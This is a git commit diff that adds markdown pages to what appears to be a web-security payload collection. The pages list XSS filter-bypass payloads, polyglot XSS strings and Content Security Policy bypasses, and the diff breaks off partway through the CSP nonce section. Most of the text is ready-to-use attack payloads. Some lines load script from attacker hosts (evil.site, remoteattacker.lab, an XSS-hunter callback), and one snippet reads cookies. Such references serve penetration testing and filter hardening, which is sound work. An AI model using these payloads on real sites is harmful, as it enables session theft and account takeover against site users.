References updated for XSS + page splitted in subcategories

2024-12-12 06:12:47 +00:00 · 2024-11-08 18:23:43 +01:00 · 2024-11-08 18:23:43 +01:00 · 4f0e6334bd
commit 4f0e6334bd
parent 37641d2b9e
6 changed files with 892 additions and 894 deletions
--- a/Injection/1
+++ b/Injection/1
@ -0,0 +1,570 @@
+# XSS Filter Bypass
+
+## Summary
+
+- [Bypass case sensitive](#bypass-case-sensitive)
+- [Bypass tag blacklist](#bypass-tag-blacklist)
+- [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation)
+- [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag)
+- [Bypass quotes for string](#bypass-quotes-for-string)
+- [Bypass quotes in script tag](#bypass-quotes-in-script-tag)
+- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
+- [Bypass dot filter](#bypass-dot-filter)
+- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
+- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
+- [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist)
+- [Bypass space filter](#bypass-space-filter)
+- [Bypass email filter](#bypass-email-filter)
+- [Bypass document blacklist](#bypass-document-blacklist)
+- [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist)
+- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
+- [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
+- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
+- [Bypass ">" using nothing](#bypass--using-nothing)
+- [Bypass "<" and ">" using ＜ and ＞](#bypass--and--using--and-)
+- [Bypass ";" using another character](#bypass--using-another-character)
+- [Bypass using missing charset header](#bypass-using-missing-charset-header)
+- [Bypass using HTML encoding](#bypass-using-html-encoding)
+- [Bypass using Katakana](#bypass-using-katakana)
+- [Bypass using Cuneiform](#bypass-using-cuneiform)
+- [Bypass using Lontara](#bypass-using-lontara)
+- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
+- [Bypass using Octal encoding](#bypass-using-octal-encoding)
+- [Bypass using Unicode](#bypass-using-unicode)
+- [Bypass using UTF-7](#bypass-using-utf-7)
+- [Bypass using UTF-8](#bypass-using-utf-8)
+- [Bypass using UTF-16be](#bypass-using-utf-16be)
+- [Bypass using UTF-32](#bypass-using-utf-32)
+- [Bypass using BOM](#bypass-using-bom)
+- [Bypass using jsfuck](#bypass-using-jsfuck)
+- [References](#references)
+
+
+## Bypass case sensitive
+
+To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names.
+
+```javascript
+<sCrIpt>alert(1)</ScRipt>
+<ScrIPt>alert(1)</ScRipT>
+```
+
+Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters.
+
+
+## Bypass tag blacklist
+
+```javascript
+<script x>
+<script x>alert('XSS')<script y>
+```
+
+## Bypass word blacklist with code evaluation
+
+```javascript
+eval('ale'+'rt(0)');
+Function("ale"+"rt(1)")();
+new Function`al\ert\`6\``;
+setTimeout('ale'+'rt(2)');
+setInterval('ale'+'rt(10)');
+Set.constructor('ale'+'rt(13)')();
+Set.constructor`al\x65rt\x2814\x29```;
+```
+
+## Bypass with incomplete html tag
+
+Works on IE/Firefox/Chrome/Safari
+
+```javascript
+<img src='1' onerror='alert(0)' <
+```
+
+## Bypass quotes for string
+
+```javascript
+String.fromCharCode(88,83,83)
+```
+
+## Bypass quotes in script tag
+
+```javascript
+http://localhost/bla.php?test=</script><script>alert(1)</script>
+<html>
+  <script>
+    <?php echo 'foo="text '.$_GET['test'].'";';`?>
+  </script>
+</html>
+```
+
+## Bypass quotes in mousedown event
+
+You can bypass a single quote with &#39; in an on mousedown event handler
+
+```javascript
+<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
+```
+
+## Bypass dot filter
+
+```javascript
+<script>window['alert'](document['domain'])</script>
+```
+
+Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
+http://www.geektools.com/cgi-bin/ipconv.cgi
+
+```javascript
+<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
+```
+
+Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
+
+## Bypass parenthesis for string
+
+```javascript
+alert`1`
+setTimeout`alert\u0028document.domain\u0029`;
+```
+
+## Bypass parenthesis and semi colon
+
+```javascript
+// From @garethheyes
+<script>onerror=alert;throw 1337</script>
+<script>{onerror=alert}throw 1337</script>
+<script>throw onerror=alert,'some string',123,'haha'</script>
+
+// From @terjanq
+<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
+
+// From @cgvwzq
+<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
+```
+
+## Bypass onxxxx= blacklist
+
+```javascript
+<object onafterscriptexecute=confirm(0)>
+<object onbeforescriptexecute=confirm(0)>
+
+// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
+<img src='1' onerror\x00=alert(0) />
+<img src='1' onerror\x0b=alert(0) />
+<img src='1' onerror\x0d=alert(0) />
+<img src='1' onerror\x0a=alert(0) />
+
+// Bypass onxxx= filter with a '/'
+<img src='1' onerror/=alert(0) />
+```
+
+## Bypass space filter
+
+```javascript
+// Bypass space filter with "/"
+<img/src='1'/onerror=alert(0)>
+
+// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I
+<svgonload=alert(1)>
+
+$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
+00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c  <svg.onload.=.al
+00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
+```
+
+
+## Bypass email filter
+
+* [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
+  ```javascript
+  "><svg/onload=confirm(1)>"@x.y
+  ```
+
+* [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)
+  ```javascript
+  xss@example.com(<img src='x' onerror='alert(document.location)'>)
+  ```
+
+
+## Bypass tel URI filter
+
+At least 2 RFC mention the `;phone-context=` descriptor:
+
+* [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt)
+* [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt)
+
+```javascript
+330011223344;phone-context=<script>alert(0)</script>
+```
+
+
+## Bypass document blacklist
+
+```javascript
+<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
+window["doc"+"ument"]
+```
+
+## Bypass document.cookie blacklist
+
+This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
+
+```
+window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
+```
+
+## Bypass using javascript inside a string
+
+```javascript
+<script>
+foo="text </script><script>alert(1)</script>";
+</script>
+```
+
+## Bypass using an alternate way to redirect
+
+```javascript
+location="http://google.com"
+document.location = "http://google.com"
+document.location.href="http://google.com"
+window.location.assign("http://google.com")
+window['location']['href']="http://google.com"
+```
+
+## Bypass using an alternate way to execute an alert
+
+From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet.
+
+```javascript
+window['alert'](0)
+parent['alert'](1)
+self['alert'](2)
+top['alert'](3)
+this['alert'](4)
+frames['alert'](5)
+content['alert'](6)
+
+[7].map(alert)
+[8].find(alert)
+[9].every(alert)
+[10].filter(alert)
+[11].findIndex(alert)
+[12].forEach(alert);
+```
+
+From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables
+
+The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**.
+
+```javascript
+c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
+// 5
+```
+
+Then calling alert is :
+
+```javascript
+Object.keys(self)[5]
+// "alert"
+self[Object.keys(self)[5]]("1") // alert("1")
+```
+
+We can find "alert" with a regular expression like ^a[rel]+t$ :
+
+```javascript
+a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
+
+// then you can use a() with Object.keys
+
+self[Object.keys(self)[a()]]("1") // alert("1")
+```
+
+Oneliner:
+```javascript
+a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
+```
+
+From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet.
+
+```javascript
+prompt`${document.domain}`
+document.location='java\tscript:alert(1)'
+document.location='java\rscript:alert(1)'
+document.location='java\tscript:alert(1)'
+```
+
+From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet.
+
+```javascript
+eval('ale'+'rt(0)');
+Function("ale"+"rt(1)")();
+new Function`al\ert\`6\``;
+
+constructor.constructor("aler"+"t(3)")();
+[].filter.constructor('ale'+'rt(4)')();
+
+top["al"+"ert"](5);
+top[8680439..toString(30)](7);
+top[/al/.source+/ert/.source](8);
+top['al\x65rt'](9);
+
+open('java'+'script:ale'+'rt(11)');
+location='javascript:ale'+'rt(12)';
+
+setTimeout`alert\u0028document.domain\u0029`;
+setTimeout('ale'+'rt(2)');
+setInterval('ale'+'rt(10)');
+Set.constructor('ale'+'rt(13)')();
+Set.constructor`al\x65rt\x2814\x29```;
+```
+
+Bypass using an alternate way to trigger an alert
+
+```javascript
+var i = document.createElement("iframe");
+i.onload = function(){
+  i.contentWindow.alert(1);
+}
+document.appendChild(i);
+
+// Bypassed security
+XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
+      var proxy = obj[name];
+      obj[name] = function () {
+        if (exec_original) {
+          return proxy.apply(this, arguments);
+        }
+      };
+      XSSObject.lockdown(obj, name);
+  };
+XSSObject.proxy(window, 'alert', 'window.alert', false);
+```
+
+## Bypass ">" using nothing
+
+You don't need to close your tags.
+
+```javascript
+<svg onload=alert(1)//
+```
+
+## Bypass "<" and ">" using ＜ and ＞
+
+Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#bypass-using-unicode) for more.
+
+```javascript
+＜script/src=//evil.site/poc.js＞
+```
+
+## Bypass ";" using another character
+
+```javascript
+'te' * alert('*') * 'xt';
+'te' / alert('/') / 'xt';
+'te' % alert('%') % 'xt';
+'te' - alert('-') - 'xt';
+'te' + alert('+') + 'xt';
+'te' ^ alert('^') ^ 'xt';
+'te' > alert('>') > 'xt';
+'te' < alert('<') < 'xt';
+'te' == alert('==') == 'xt';
+'te' & alert('&') & 'xt';
+'te' , alert(',') , 'xt';
+'te' | alert('|') | 'xt';
+'te' ? alert('ifelsesh') : 'xt';
+'te' in alert('in') in 'xt';
+'te' instanceof alert('instanceof') instanceof 'xt';
+```
+
+
+## Bypass using missing charset header
+
+**Requirements**:
+
+* Server header missing `charset`: `Content-Type: text/html`
+
+### ISO-2022-JP
+
+ISO-2022-JP uses escape characters to switch between several character sets.
+
+| Escape    | Encoding        |
+|-----------|-----------------|
+| `\x1B (B` | ASCII           |
+| `\x1B (J` | JIS X 0201 1976 |
+| `\x1B $@` | JIS X 0208 1978 |
+| `\x1B $B` | JIS X 0208 1983 |
+
+
+Using the [code table](https://en.wikipedia.org/wiki/JIS_X_0201#Codepage_layout), we can find multiple characters that will be transformed when switching from **ASCII** to **JIS X 0201 1976**.
+
+| Hex  | ASCII | JIS X 0201 1976 |
+| ---- | --- | --- |
+| 0x5c | `\` | `¥` | 
+| 0x7e | `~` | `‾` |
+
+
+**Example**
+
+Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unescaping the quote.
+
+Payload: `search=%1b(J&lang=en";alert(1)//`
+
+
+## Bypass using HTML encoding
+
+```javascript
+%26%2397;lert(1)
+&#97;&#108;&#101;&#114;&#116;
+></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
+```
+
+## Bypass using Katakana
+
+Using the [aemkei/Katakana](https://github.com/aemkei/katakana.js) library.
+
+```javascript
+javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
+```
+
+## Bypass using Cuneiform
+
+```javascript
+𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
+𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
+```
+
+## Bypass using Lontara
+
+```javascript
+ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
+```
+
+More alphabets on http://aem1k.com/aurebesh.js/#
+
+## Bypass using ECMAScript6
+
+```html
+<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
+```
+
+## Bypass using Octal encoding
+
+
+```javascript
+javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
+```
+
+## Bypass using Unicode
+
+This payload takes advantage of Unicode escape sequences to obscure the JavaScript function
+
+```html
+<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
+```
+
+It uses Unicode escape sequences to represent characters.
+
+| Unicode  | ASCII     |
+| -------- | --------- |
+| `\u0061` | a         |
+| `\u006C` | l         |
+| `\u0065` | e         |
+| `\u0072` | r         |
+| `\u0074` | t         |
+
+
+Same thing with these Unicode characters.
+
+| Unicode (UTF-8 encoded) | Unicode Name                 | ASCII | ASCII Name     |
+| ----------------------- | ---------------------------- | ----- | ---------------|
+| `\uFF1C` (%EF%BC%9C)    | FULLWIDTH LESSTHAN SIGN      | <     | LESSTHAN       |
+| `\uFF1E` (%EF%BC%9E)    | FULLWIDTH GREATERTHAN SIGN   | >     | GREATERTHAN    |
+| `\u02BA` (%CA%BA)       | MODIFIER LETTER DOUBLE PRIME | "     | QUOTATION MARK |
+| `\u02B9` (%CA%B9)       | MODIFIER LETTER PRIME        | '     | APOSTROPHE     |
+
+
+An example payload could be `ʺ＞＜svg onload=alert(/XSS/)＞/`, which would look like that after being URL encoded:
+
+```javascript
+%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
+```
+
+
+When Unicode characters are converted to another case, they might bypass a filter look for specific keywords.
+
+| Unicode  | Transform | Character |
+| -------- | --------- | --------- |
+| `İ` (%c4%b0) | `toLowerCase()` | i |
+| `ı` (%c4%b1) | `toUpperCase()` | I |
+| `ſ` (%c5%bf) | `toUpperCase()` | S |
+| `K` (%E2%84) | `toLowerCase()` | k |
+
+The following payloads become valid HTML tags after being converted.
+
+```html
+<ſvg onload=... >
+<ıframe id=x onload=>
+```
+
+
+## Bypass using UTF-7
+
+```javascript
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
+```
+
+## Bypass using UTF-8
+
+```javascript
+< = %C0%BC = %E0%80%BC = %F0%80%80%BC
+> = %C0%BE = %E0%80%BE = %F0%80%80%BE
+' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
+" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
+" = %CA%BA
+' = %CA%B9
+```
+
+## Bypass using UTF-16be
+
+```javascript
+%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
+\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
+```
+
+## Bypass using UTF-32
+
+```js
+%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
+```
+
+## Bypass using BOM
+
+Byte Order Mark (The page must begin with the BOM character.)
+BOM character allows you to override charset of the page
+
+```js
+BOM Character for UTF-16 Encoding:
+Big Endian : 0xFE 0xFF
+Little Endian : 0xFF 0xFE
+XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
+
+BOM Character for UTF-32 Encoding:
+Big Endian : 0x00 0x00 0xFE 0xFF
+Little Endian : 0xFF 0xFE 0x00 0x00
+XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
+```
+
+
+## Bypass using jsfuck
+
+Bypass using [jsfuck](http://www.jsfuck.com/)
+
+```javascript
+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
+```
+
+
+## References
+
+- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
--- a/Polyglot.md
+++ b/Polyglot.md
@ -0,0 +1,77 @@
+# Polyglot XSS
+
+* Polyglot XSS - 0xsobky
+    ```javascript
+    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+    ```
+
+* Polyglot XSS - Ashar Javed
+    ```javascript
+    ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
+    ```
+
+* Polyglot XSS - Mathias Karlsson
+    ```javascript
+    " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
+    ```
+
+* Polyglot XSS - Rsnake
+    ```javascript
+    ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
+    ```
+
+* Polyglot XSS - Daniel Miessler
+    ```javascript
+    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+    “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
+    '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
+    javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
+    javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
+    javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
+    javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
+    javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
+    javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
+    javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
+    --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
+    /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
+    javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
+    /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
+    ```
+
+
+*  Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
+    ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
+    ```javascript
+    -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
+    ```
+
+    ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
+    ```javascript
+    <svg%0Ao%00nload=%09((pro\u006dpt))()//
+    ```
+
+* Polyglot XSS - from [@filedescriptor's Polyglot Challenge](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
+    ```javascript
+    // Author: crlf
+    javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
+
+    // Author: europa
+    javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
+
+    // Author: EdOverflow
+    javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
+
+    // Author: h1/ragnar
+    javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
+    ```
+
+* Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/)
+    ```javascript
+    JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
+    ```
+
+
+## References
+
+- [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/)
+- [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
--- a/Injection/XSS
+++ b/Injection/XSS
--- a/Injection/4
+++ b/Injection/4
@ -0,0 +1,181 @@
+# CSP Bypass
+
+> A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, styles, images, etc.) are allowed to load and execute on a webpage.
+
+
+## Summary
+
+- [CSP Detection](#csp-detection)
+- [Bypass CSP using JSONP](#bypass-csp-using-jsonp)
+- [Bypass CSP default-src](#bypass-csp-default-src)
+- [Bypass CSP inline eval](#bypass-csp-inline-eval)
+- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
+- [Bypass CSP script-src self](#bypass-csp-script-src-self)
+- [Bypass CSP script-src data](#bypass-csp-script-src-data)
+- [Bypass CSP nonce](#bypass-csp-nonce)
+- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
+- [References](#references)
+
+
+## CSP Detection
+
+Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/)
+
+
+## Bypass CSP using JSONP
+
+**Requirements**:
+
+* CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';`
+
+**Payload**:
+
+Use a callback function from a whitelisted source listed in the CSP.
+
+* Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);`
+* Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`
+* Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();`
+* Youtube: `https://www.youtube.com/oembed?callback=alert;`
+* [Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
+* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
+
+```js
+<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
+```
+
+
+## Bypass CSP default-src
+
+**Requirements**:
+
+* CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, 
+
+**Payload**:
+
+`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
+
+```js
+script=document.createElement('script');
+script.src='//remoteattacker.lab/csp.js';
+window.frames[0].document.head.appendChild(script);
+```
+
+Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
+
+
+## Bypass CSP inline eval 
+
+**Requirements**:
+
+* CSP `inline` or `eval`
+
+
+**Payload**:
+
+```js
+d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
+```
+
+Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
+
+
+## Bypass CSP script-src self 
+
+**Requirements**:
+
+* CSP like `script-src self`
+
+**Payload**:
+
+```js
+<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
+```
+
+Source: [@akita_zen](https://twitter.com/akita_zen)
+
+
+## Bypass CSP script-src data
+
+**Requirements**:
+
+* CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
+
+
+**Payload**:
+
+```javascript
+<script src="data:,alert(1)">/</script>
+```
+
+Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
+
+
+## Bypass CSP unsafe-inline
+
+**Requirements**:
+
+* CSP: `script-src https://google.com 'unsafe-inline';`
+
+**Payload**:
+
+```javascript
+"/><script>alert(1);</script>
+```
+
+
+## Bypass CSP nonce
+
+**Requirements**:
+
+* CSP like `script-src 'nonce-RANDOM_NONCE'`
+* Imported JS file with a relative link: `<script src='/PATH.js'></script>`
+
+
